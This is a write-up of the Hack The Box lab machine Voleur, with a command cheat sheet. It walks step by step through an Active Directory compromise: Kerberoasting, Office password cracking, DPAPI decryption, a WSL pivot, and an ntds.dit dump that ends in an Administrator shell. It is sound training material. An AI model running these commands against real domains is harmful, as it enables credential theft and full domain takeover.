Field Manual

HTB: Voleur

20 min read

πŸ•΅οΈ Voleur

Machine: Voleur
Difficulty: Medium
Theme: Kerberos-only AD environment β†’ SMB share enumeration β†’ encrypted Office document cracking β†’ service account discovery β†’ WriteSPN Kerberoasting β†’ WinRM foothold β†’ deleted AD object restore β†’ DPAPI credential recovery β†’ WSL SSH pivot β†’ offline NTDS extraction β†’ Administrator shell

🎯 Summary

Voleur is a Windows Active Directory machine where the main challenge is recognizing that NTLM is disabled and adapting the entire workflow to Kerberos.

Initial enumeration identifies a domain controller exposing Kerberos, LDAP, SMB, WinRM, ADWS, and an unusual SSH service on port 2222. Standard username/password authentication attempts over SMB and LDAP fail with STATUS_NOT_SUPPORTED because NTLM is disabled. After configuring /etc/hosts, /etc/krb5.conf, and syncing time with the DC, Kerberos authentication works.

Using the provided low-privileged account, SMB share enumeration reveals a readable IT share. Spidering the share finds an encrypted access-review spreadsheet. The spreadsheet is downloaded with NetExec using Kerberos cache authentication, then cracked offline with office2john and John. The document exposes service account credentials and a note about a deleted user account.

The svc_ldap service account is valid and BloodHound shows it has WriteSPN over svc_winrm, allowing targeted Kerberoasting. Because NTLM is disabled, both the SPN modification and Kerberoasting are performed using Kerberos-aware tooling. The cracked svc_winrm credential gives a Kerberos Evil-WinRM shell and the user flag.

BloodHound also shows that svc_ldap is a member of a restore-related group. From the svc_winrm shell, RunasCs.exe is used to execute PowerShell as svc_ldap, enumerate deleted AD objects, and restore the deleted todd.wolfe account. Todd’s reset password from the spreadsheet then works for Kerberos authentication.

As Todd, SMB access reveals an archived user profile under the IT share. The archived profile contains DPAPI credential blobs and masterkey material. Using Todd’s SID and password, the DPAPI masterkey is decrypted offline, then used to decrypt a saved Windows Credential Manager blob. This reveals credentials for jeremy.combs.

Jeremy has WinRM access and can read the third-line support folder. That folder contains an SSH private key and a note explaining that WSL was partially configured for backup tooling. The SSH key works against port 2222 as svc_backup, landing in an Ubuntu/WSL environment. svc_backup has passwordless sudo, and the WSL filesystem can access Windows-mounted backup directories that were denied from Windows.

The backup directory contains ntds.dit, SYSTEM, and SECURITY. These are copied back to the attacker machine and processed offline with secretsdump. The Administrator NT hash is recovered. Since NTLM is disabled, the hash is used to request a Kerberos TGT, which is then used with Evil-WinRM to obtain an Administrator shell and read the root flag.

1. Enumeration

Initial scanning identified a Windows Active Directory domain controller.

Full TCP scan:

sudo nmap -p- --min-rate=5000 -T4 -vv -oA nmap/voleur_portscan [TARGET_IP]

Targeted service scan:

sudo nmap -sC -sV -vv -oA nmap/voleur [TARGET_IP]

Important services included:

53/tcp     domain
88/tcp     kerberos-sec
135/tcp    msrpc
139/tcp    netbios-ssn
389/tcp    ldap
445/tcp    microsoft-ds
464/tcp    kpasswd5
593/tcp    http-rpc-epmap
636/tcp    ldapssl
2222/tcp   ssh
3268/tcp   globalcatLDAP
3269/tcp   globalcatLDAPssl
5985/tcp   winrm
9389/tcp   adws

The host behaved like a domain controller:

Domain: voleur.htb
Host:   DC
FQDN:   dc.voleur.htb

The hostnames were added to /etc/hosts:

echo "[TARGET_IP] dc.voleur.htb voleur.htb dc" | sudo tee -a /etc/hosts

Nmap also showed a large clock skew, which mattered later because Kerberos requires time synchronization.

2. NTLM Disabled and Kerberos Setup

Initial NetExec authentication attempts failed:

nxc smb voleur.htb -u '[USER]' -p '[PASS]'
nxc ldap voleur.htb -u '[USER]' -p '[PASS]'

Failure pattern:

NTLM:False
STATUS_NOT_SUPPORTED

This was the key early lesson: the credentials were not necessarily wrong; the authentication method was wrong.

A minimal Kerberos config was created:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
 
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
 
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

The VM time was synchronized with the DC:

sudo ntpdate [TARGET_IP]

A Kerberos TGT was requested:

impacket-getTGT voleur.htb/[USER]:'[PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

Expected output:

Default principal: [USER]@VOLEUR.HTB
krbtgt/VOLEUR.HTB@VOLEUR.HTB

Important gotcha:

Use the DC FQDN for Kerberos-aware tooling. Avoid targeting only the domain name or the IP unless the tool specifically supports it.

3. RustHound-CE / BloodHound Collection

After fixing the Kerberos/domain confusion, RustHound-CE worked with the initial user:

rusthound-ce \
  --domain voleur.htb \
  -u '[USER]' \
  -p '[PASSWORD]' \
  -z

The first mistake was using the DC FQDN as the domain. The correct separation was:

Domain: voleur.htb
DC:     dc.voleur.htb
Realm:  VOLEUR.HTB

The generated RustHound zip was imported into BloodHound.

At this early stage, BloodHound did not immediately give the full path. SMB file enumeration was the more useful next step.

4. SMB Share Enumeration with Kerberos

Kerberos-authenticated SMB share enumeration worked:

nxc smb dc.voleur.htb --use-kcache --shares

Readable shares included:

IPC$      READ
IT        READ
NETLOGON  READ
SYSVOL    READ

The IT share was the main target.

A content search found a password-related hit inside an Excel file:

nxc smb dc.voleur.htb --use-kcache --spider IT --content --pattern "passw"

Interesting file:

IT/First-Line Support/Access_Review.xlsx

The file was downloaded with NetExec:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx

Important gotcha:

When using --share IT, the remote path is relative to the share. Do not include IT\\ again in the path.

5. Encrypted Office Document Cracking

The downloaded file was confirmed to be encrypted:

file Access_Review.xlsx

Output:

Access_Review.xlsx: CDFV2 Encrypted

The Office hash was extracted:

office2john Access_Review.xlsx > office_hash.txt

The document password was cracked:

john office_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john office_hash.txt --show

After opening the spreadsheet, it revealed:

Users
Service accounts
Permissions
Notes
Deleted user password reset note
Service account credentials

Important findings included:

svc_ldap   : [SVC_LDAP_PASSWORD]
svc_iis    : [SVC_IIS_PASSWORD]
todd.wolfe : [TODD_RESET_PASSWORD]

The spreadsheet also suggested that Todd’s account had been deleted, not merely disabled.

6. Validating svc_ldap

The svc_ldap credential was validated with Kerberos-aware LDAP:

nxc ldap voleur.htb -u 'svc_ldap' -p '[SVC_LDAP_PASSWORD]' -k

Successful result:

[+] voleur.htb\svc_ldap:[SVC_LDAP_PASSWORD]

BloodHound showed two important facts about svc_ldap:

svc_ldap -> WriteSPN -> svc_winrm
svc_ldap -> MemberOf -> Restore_Users

These represented two separate primitives:

WriteSPN      β†’ targeted Kerberoasting of svc_winrm
Restore_Users β†’ deleted-object restoration later

The next useful path was to abuse WriteSPN.

7. WriteSPN Abuse and Targeted Kerberoasting

A TGT was requested for svc_ldap:

impacket-getTGT voleur.htb/svc_ldap:'[SVC_LDAP_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath svc_ldap.ccache)"
klist

The fake SPN was added to svc_winrm using bloodyAD with Kerberos cache authentication:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  set object svc_winrm servicePrincipalName -v 'http/malicious'

Important gotcha:

NetExec uses --use-kcache, but bloodyAD uses:

-k ccache=<path>

The TGS was requested with Kerberos, not NTLM:

GetUserSPNs.py \
  -k \
  -no-pass \
  -dc-host dc.voleur.htb \
  voleur.htb/svc_ldap \
  -request

The resulting Kerberoast hash was saved to a file and cracked with Hashcat mode 13100:

hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
hashcat -m 13100 svc_winrm.hash --show

Recovered:

svc_winrm : [SVC_WINRM_PASSWORD]

The fake SPN was cleaned up. First the current value was verified:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  get object svc_winrm --attr servicePrincipalName

The planted SPN was removed with the msldap SPN helper:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  msldap delspn 'CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb' 'http/malicious'

Important gotcha:

remove object in bloodyAD deletes an object. It is not the correct syntax for removing an SPN attribute value.

8. WinRM as svc_winrm

A TGT was requested for svc_winrm using the cracked password:

impacket-getTGT voleur.htb/svc_winrm:'[SVC_WINRM_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath svc_winrm.ccache)"
klist

Evil-WinRM worked in Kerberos realm mode:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Verification:

whoami
hostname
whoami /groups

The user flag was recovered from:

C:\Users\svc_winrm\Desktop\user.txt

Important gotcha:

Using Evil-WinRM with -u and -p caused unstable behavior because the box did not support NTLM. The reliable method was Kerberos mode with -r.

9. Restoring Deleted Todd Wolfe

BloodHound showed that svc_ldap belonged to a restore-related group. The goal was to restore the deleted todd.wolfe account mentioned in the spreadsheet.

Inside the svc_winrm Evil-WinRM shell, a temporary working directory was created:

mkdir C:\Temp
cd C:\Temp

RunasCs.exe was uploaded:

upload RunasCs.exe

A sanity check confirmed commands could run as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "cmd /c whoami"

Expected output:

voleur\svc_ldap

To avoid quoting problems, an enumeration script was created:

Set-Content C:\Temp\enum_deleted.ps1 @'
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties distinguishedName,objectSid,sAMAccountName -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb' | Format-List Name,ObjectClass,DistinguishedName,ObjectSid
'@

It was executed as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\enum_deleted.ps1"

The deleted object was found:

Name              : Todd Wolfe
ObjectClass       : user
DistinguishedName : CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb
ObjectSid         : [TODD_SID]

The exact DN was used in a restore script:

Set-Content C:\Temp\restore_todd.ps1 @'
Import-Module ActiveDirectory
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb'
'@

The restore was executed as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\restore_todd.ps1"

No output was normal. The deleted-object enumeration was run again, and Todd no longer appeared.

From Kali, Todd’s reset password was validated:

impacket-getTGT voleur.htb/todd.wolfe:'[TODD_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath todd.wolfe.ccache)"
klist

This confirmed the restored account was usable.

10. Todd SMB Access and Archived Profile Discovery

Todd’s SMB access was checked:

nxc smb dc.voleur.htb --use-kcache --shares

The same IT share was readable, but Todd had access to a deeper archived user area.

Spidering revealed:

IT/Second-Line Support/Archived Users/todd.wolfe/

The most important paths were:

AppData/Roaming/Microsoft/Credentials/[CREDENTIAL_BLOB]
AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY_GUID]
AppData/Roaming/Microsoft/Protect/[TODD_SID]/Preferred
AppData/Roaming/Microsoft/Protect/[TODD_SID]/BK-VOLEUR

This indicated a DPAPI path.

Important conceptual relationship:

Credential blob
  encrypted by DPAPI masterkey
 
DPAPI masterkey
  decrypted using Todd SID + Todd password
 
Decrypted masterkey
  decrypts the credential blob

The Roaming credential blob was prioritized because it paired naturally with the Roaming Protect\<SID> directory.

11. DPAPI Credential Recovery

The credential blob and masterkey were downloaded:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/[CREDENTIAL_BLOB]' [CREDENTIAL_BLOB]
 
nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY_GUID]' [MASTERKEY_GUID]

The masterkey was decrypted offline:

impacket-dpapi masterkey \
  -file [MASTERKEY_GUID] \
  -sid [TODD_SID] \
  -password '[TODD_PASSWORD]'

Successful output included:

Decrypted key with User Key
Decrypted key: 0x[DPAPI_MASTERKEY]

The credential blob was decrypted:

impacket-dpapi credential \
  -file [CREDENTIAL_BLOB] \
  -key 0x[DPAPI_MASTERKEY]

Recovered credential:

Type     : CRED_TYPE_DOMAIN_PASSWORD
Target   : Domain:target=Jezzas_Account
Username : jeremy.combs
Password : [JEREMY_PASSWORD]

Important gotcha:

The Target field was only a saved label. The actionable credential was the Username and password.

12. WinRM as Jeremy Combs

Jeremy’s credentials were validated:

impacket-getTGT voleur.htb/jeremy.combs:'[JEREMY_PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath jeremy.combs.ccache)"
klist

Evil-WinRM worked with Kerberos:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Jeremy had access to the third-line support folder:

cd C:\IT\Third-Line Support
dir

Interesting files:

id_rsa
Note.txt.txt
Backups\

The note explained:

Windows Backup was problematic.
WSL had been partially configured for Linux backup tools.

The SSH private key was downloaded:

download id_rsa

The Backups folder was denied from Jeremy’s Windows session, but the note and port 2222 suggested trying the WSL/SSH side.

13. SSH to WSL as svc_backup

The key was prepared locally:

chmod 600 id_rsa
file id_rsa

SSH was attempted against port 2222:

ssh -i id_rsa svc_backup@dc.voleur.htb -p 2222

This landed in Ubuntu on WSL:

Welcome to Ubuntu 20.04 LTS
GNU/Linux ... Microsoft x86_64

The user was confirmed:

whoami

Output:

svc_backup

sudo -l showed full passwordless sudo:

(ALL : ALL) ALL
(ALL) NOPASSWD: ALL

Important distinction:

Root in WSL is not automatically Windows Administrator. However, WSL can still access mounted Windows paths under /mnt/c, which made the backup folder accessible.

14. Accessing Backup Files Through WSL

The Windows backup directory was inspected from WSL:

ls -la /mnt/c/IT/'Third-Line Support'/Backups
find /mnt/c/IT/'Third-Line Support'/Backups -maxdepth 3 -type f -ls

Important files:

/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit
/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM
/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY

This was an offline domain credential extraction path.

The files were copied back from Kali using scp:

scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

Important gotcha:

Run scp from Kali, not from inside the WSL SSH session. Also quote remote paths because they contain spaces.

Local verification:

ls -lh ntds.dit SYSTEM SECURITY
file ntds.dit SYSTEM SECURITY

Expected:

ntds.dit: Extensible storage engine DataBase
SYSTEM:   MS Windows registry file
SECURITY: MS Windows registry file

15. Offline NTDS Extraction

The AD database and registry hives were processed offline:

impacket-secretsdump \
  -ntds ntds.dit \
  -system SYSTEM \
  -security SECURITY \
  LOCAL

This dumped domain NT hashes and Kerberos keys, including the Administrator account.

Important finding:

Administrator : [ADMIN_NT_HASH]

Since NTLM was disabled on the target, the Administrator hash was not used with classic pass-the-hash WinRM. Instead, it was used to request a Kerberos TGT.

16. Administrator Shell

A TGT was requested using the Administrator NT hash:

impacket-getTGT voleur.htb/administrator \
  -hashes :[ADMIN_NT_HASH] \
  -dc-ip [TARGET_IP]

The cache was exported:

export KRB5CCNAME="$(realpath administrator.ccache)"
klist

Expected:

Default principal: administrator@VOLEUR.HTB
krbtgt/VOLEUR.HTB@VOLEUR.HTB

Evil-WinRM was used with Kerberos realm mode:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Administrator access was confirmed:

whoami
hostname
whoami /groups

The root flag was read from:

C:\Users\Administrator\Desktop\root.txt

A cleanup script in the Administrator profile showed that Todd’s account was intentionally deleted/reset as part of the machine behavior:

get-aduser -identity todd.wolfe
if ($? -eq $true) {
    remove-aduser -identity todd.wolfe -confirm:$false
}

This confirmed that restoring Todd was part of the intended path.

πŸ”— Condensed Attack Chain

Full TCP scan
  ↓
Domain controller identified
  ↓
NTLM disabled discovered through NetExec failures
  ↓
/etc/hosts, krb5.conf, and time sync configured
  ↓
Kerberos TGT requested for initial user
  ↓
Kerberos SMB share enumeration
  ↓
Readable IT share found
  ↓
Access_Review.xlsx found via SMB spider/content search
  ↓
Spreadsheet downloaded with NetExec --use-kcache
  ↓
Office document password cracked
  ↓
Spreadsheet reveals svc_ldap, service-account notes, and deleted Todd password
  ↓
svc_ldap validated with Kerberos LDAP
  ↓
BloodHound shows svc_ldap WriteSPN over svc_winrm
  ↓
Fake SPN added to svc_winrm
  ↓
Kerberoast TGS requested with Kerberos
  ↓
svc_winrm hash cracked
  ↓
Fake SPN cleaned up
  ↓
TGT requested for svc_winrm
  ↓
Evil-WinRM Kerberos shell as svc_winrm
  ↓
user.txt recovered
  ↓
RunasCs uploaded
  ↓
PowerShell executed as svc_ldap
  ↓
Deleted Todd Wolfe object enumerated
  ↓
Todd restored with Restore-ADObject
  ↓
Todd TGT requested using spreadsheet password
  ↓
Todd SMB access reveals archived profile
  ↓
DPAPI Credential and Protect files downloaded
  ↓
Todd SID + Todd password decrypt DPAPI masterkey
  ↓
DPAPI credential blob decrypted
  ↓
jeremy.combs credential recovered
  ↓
Kerberos WinRM as jeremy.combs
  ↓
Third-Line Support folder accessed
  ↓
id_rsa and WSL backup note found
  ↓
SSH to port 2222 as svc_backup
  ↓
WSL sudo access confirmed
  ↓
Windows backup files accessed under /mnt/c
  ↓
ntds.dit, SYSTEM, SECURITY copied to Kali
  ↓
secretsdump extracts domain hashes offline
  ↓
Administrator hash used to request Kerberos TGT
  ↓
Evil-WinRM as Administrator
  ↓
root.txt recovered

🧠 Key Takeaways

NTLM-disabled environments require a mindset shift. Standard -u/-p authentication may fail even when credentials are valid.

Kerberos setup matters. /etc/hosts, /etc/krb5.conf, DC FQDN usage, and clock sync were all required.

Always check klist. Many failures came from the wrong .ccache being active.

NetExec and bloodyAD use different Kerberos cache syntax. NetExec uses --use-kcache; bloodyAD uses -k ccache=<file>.

SMB shares can be the main exploit path. The readable IT share provided the spreadsheet that started the credential chain.

Encrypted Office files are not dead ends. office2john and John recovered the document password.

WriteSPN is a powerful targeted Kerberoasting primitive. It allowed roasting svc_winrm without needing broad SPN enumeration.

Clean up planted SPNs. After Kerberoasting, remove the temporary SPN from the target account.

WinRM should be Kerberos-based on this box. evil-winrm -r VOLEUR.HTB was the reliable pattern.

Deleted AD objects can be part of the intended path. Restore_Users membership allowed the deleted Todd account to be restored.

PSCredential creation does not validate credentials. The first AD cmdlet using -Credential is the real test.

If Evil-WinRM breaks on AD cmdlets, use a run-as helper and execute a separate PowerShell process as the privileged account.

DPAPI recovery requires multiple pieces: credential blob, masterkey, user SID, and user password.

Roaming credential blobs pair naturally with Roaming Protect\<SID> masterkeys.

WSL root is not Windows Administrator, but it may expose mounted Windows backup data.

Offline ntds.dit extraction is a full domain compromise path.

When NTLM is disabled, use recovered hashes to request Kerberos TGTs instead of trying pass-the-hash WinRM.

⚑ Commands Cheat Sheet

Kerberos Setup

echo "[TARGET_IP] dc.voleur.htb voleur.htb dc" | sudo tee -a /etc/hosts
sudo ntpdate [TARGET_IP]

Minimal /etc/krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
 
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
 
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Request and export TGT:

impacket-getTGT voleur.htb/[USER]:'[PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

Hash-based TGT:

impacket-getTGT voleur.htb/[USER] -hashes :[NT_HASH] -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

SMB Enumeration and Download

nxc smb dc.voleur.htb --use-kcache --shares
nxc smb dc.voleur.htb --use-kcache --spider IT --regex .
nxc smb dc.voleur.htb --use-kcache --spider IT --content --pattern "passw"

Download file:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Folder\\Sub Folder\\file.ext' file.ext

Office Cracking

file Access_Review.xlsx
office2john Access_Review.xlsx > office_hash.txt
john office_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john office_hash.txt --show

RustHound-CE

rusthound-ce \
  --domain voleur.htb \
  -u '[USER]' \
  -p '[PASSWORD]' \
  -z

bloodyAD Kerberos Cache

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u [USER] \
  -k ccache="$(realpath [USER].ccache)" \
  get object [OBJECT] --attr distinguishedName

WriteSPN / Targeted Kerberoast

Add fake SPN:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  set object svc_winrm servicePrincipalName -v 'http/malicious'

Request TGS:

GetUserSPNs.py \
  -k \
  -no-pass \
  -dc-host dc.voleur.htb \
  voleur.htb/svc_ldap \
  -request

Crack:

hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
hashcat -m 13100 svc_winrm.hash --show

Remove fake SPN:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  msldap delspn 'CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb' 'http/malicious'

Evil-WinRM with Kerberos

export KRB5CCNAME="$(realpath [USER].ccache)"
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

RunasCs AD Restore Workflow

Upload:

mkdir C:\Temp
cd C:\Temp
upload RunasCs.exe

Test:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "cmd /c whoami"

Create deleted-object enum script:

Set-Content C:\Temp\enum_deleted.ps1 @'
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties distinguishedName,objectSid,sAMAccountName -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb' | Format-List Name,ObjectClass,DistinguishedName,ObjectSid
'@

Run as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\enum_deleted.ps1"

Restore Todd:

Set-Content C:\Temp\restore_todd.ps1 @'
Import-Module ActiveDirectory
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb'
'@
 
.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\restore_todd.ps1"

DPAPI

Download artifacts:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/[BLOB]' [BLOB]
 
nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY]' [MASTERKEY]

Decrypt masterkey:

impacket-dpapi masterkey \
  -file [MASTERKEY] \
  -sid [TODD_SID] \
  -password '[TODD_PASSWORD]'

Decrypt credential:

impacket-dpapi credential \
  -file [BLOB] \
  -key 0x[DECRYPTED_MASTERKEY]

SSH / WSL Pivot

chmod 600 id_rsa
ssh -i id_rsa svc_backup@dc.voleur.htb -p 2222

Check sudo and backups:

whoami
sudo -l
ls -la /mnt/c/IT/'Third-Line Support'/Backups
find /mnt/c/IT/'Third-Line Support'/Backups -maxdepth 3 -type f -ls

Copy backup files from Kali:

scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

Offline NTDS Dump

impacket-secretsdump \
  -ntds ntds.dit \
  -system SYSTEM \
  -security SECURITY \
  LOCAL

Administrator TGT:

impacket-getTGT voleur.htb/administrator \
  -hashes :[ADMIN_NT_HASH] \
  -dc-ip [TARGET_IP]
 
export KRB5CCNAME="$(realpath administrator.ccache)"
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

πŸ”— Related Manual Notes

Field-manual techniques demonstrated on this box:

🧭 Diagnostic Map

Symptom: STATUS_NOT_SUPPORTED during SMB/LDAP auth Meaning: NTLM is disabled Next: Use Kerberos, TGTs, and --use-kcache

Symptom: Tool tries HTB:88 Meaning: Domain/realm inference is wrong Next: Fix /etc/krb5.conf, target dc.voleur.htb, and explicitly use voleur.htb

Symptom: Kerberos errors after config looks correct Meaning: Clock skew or wrong cache Next: sudo ntpdate [DC_IP], then klist

Symptom: smbclient returns Could not find a suitable mechtype Meaning: Local Samba Kerberos/SPNEGO issue Next: Use Impacket or NetExec with --use-kcache

Symptom: NetExec --get-file returns path not found Meaning: Remote path includes the share name twice or path escaping is wrong Next: With --share IT, use a path relative to IT

Symptom: Office file shows CDFV2 Encrypted Meaning: Password-protected Office document Next: office2john, then John/Hashcat

Symptom: GetUserSPNs.py says NTLM negotiation failed Meaning: You used password/NTLM bind Next: Use -k -no-pass with the current Kerberos cache

Symptom: bloodyAD rejects --use-kcache Meaning: That is a NetExec flag Next: Use -k ccache=<file> with bloodyAD

Symptom: SPN cleanup fails with remove object Meaning: Wrong bloodyAD command family Next: Use msldap delspn

Symptom: Evil-WinRM crashes or errors with -u/-p Meaning: NTLM/password mode is unreliable here Next: Use Kerberos mode: evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Symptom: $Cred command fails in zsh Meaning: You are back on Kali, not inside PowerShell Next: Reconnect to Evil-WinRM first

Symptom: Get-ADUser -Credential $Cred crashes Evil-WinRM Meaning: Local Evil-WinRM client instability Next: Use RunasCs to spawn PowerShell as the target account

Symptom: RunasCs.exe not recognized Meaning: PowerShell does not execute current-directory binaries by default Next: Use .\RunasCs.exe

Symptom: Restore-ADObject returns no output Meaning: Could be normal Next: Verify by re-enumerating deleted objects

Symptom: BloodHound says Todd is not in database Meaning: BloodHound data was collected before Todd was restored Next: Ignore or recollect later

Symptom: DPAPI credential blob decrypt fails Meaning: Wrong masterkey or wrong blob Next: Try the matching Roaming blob/masterkey first, then Local blob

Symptom: scp tries resolving target to 127.0.1.1 Meaning: You ran scp from inside the WSL SSH session Next: Exit and run scp from Kali

Symptom: SSH private key has bad permissions Meaning: Key is too open Next: chmod 600 id_rsa

Symptom: evil-winrm -H fails as Administrator Meaning: NTLM is disabled Next: Use the NT hash to request a Kerberos TGT

πŸ“ Personal Notes

Voleur was an excellent CPTS-style machine because it forced a Kerberos-first workflow from the beginning.

The first major lesson was not to misread STATUS_NOT_SUPPORTED as bad credentials. The server explicitly showed NTLM:False, so the right response was to fix Kerberos rather than keep trying NTLM relay, Responder, or password-mode authentication.

The second lesson was that small environment issues matter. /etc/hosts, /etc/krb5.conf, realm casing, FQDN targeting, and time sync were all required before the rest of the machine became smooth.

The SMB share was the real starting point. The readable IT share contained the encrypted spreadsheet, and the spreadsheet gave the first meaningful credential expansion. This reinforced that SMB file review can be more valuable than exploit hunting.

The spreadsheet was also a good reminder that protected Office documents are not dead ends. The document password was crackable, and once opened, the notes gave direct hints toward service accounts, Todd’s deleted state, and the later restore path.

The svc_ldap stage was a clean AD ACL abuse example. BloodHound showed WriteSPN over svc_winrm, and that translated directly into targeted Kerberoasting. The important operational detail was doing everything with Kerberos because NTLM was disabled.

Restoring Todd was initially confusing because using -Credential inside AD cmdlets caused Evil-WinRM instability. Using RunasCs to spawn a full PowerShell process as svc_ldap was more reliable and mapped better to the privilege model.

The DPAPI section was one of the most useful learning points. The spider output looked noisy at first, but the meaningful files were predictable: Credentials blobs and Protect\<SID> masterkeys. Once the relationship clicked, decrypting Jeremy’s saved credential was straightforward.

The WSL pivot was another strong methodology lesson. Root inside WSL was not the same as Windows Administrator, but it gave access to mounted Windows backup material. That was enough to reach ntds.dit, SYSTEM, and SECURITY.

The final step reinforced the Kerberos-only theme. Even with the Administrator NT hash, the correct move was not evil-winrm -H; it was requesting an Administrator TGT and then using Evil-WinRM with Kerberos realm mode.

Overall, Voleur reinforced a strong AD methodology:

Recognize authentication constraints early. Use Kerberos correctly. Enumerate SMB shares deeply. Treat Office documents and notes as credential sources. Translate BloodHound edges into exact abuse primitives. Use DPAPI methodically. Understand Windows/WSL boundary behavior. Use offline AD backups for domain compromise when available.

Graph View

Backlinks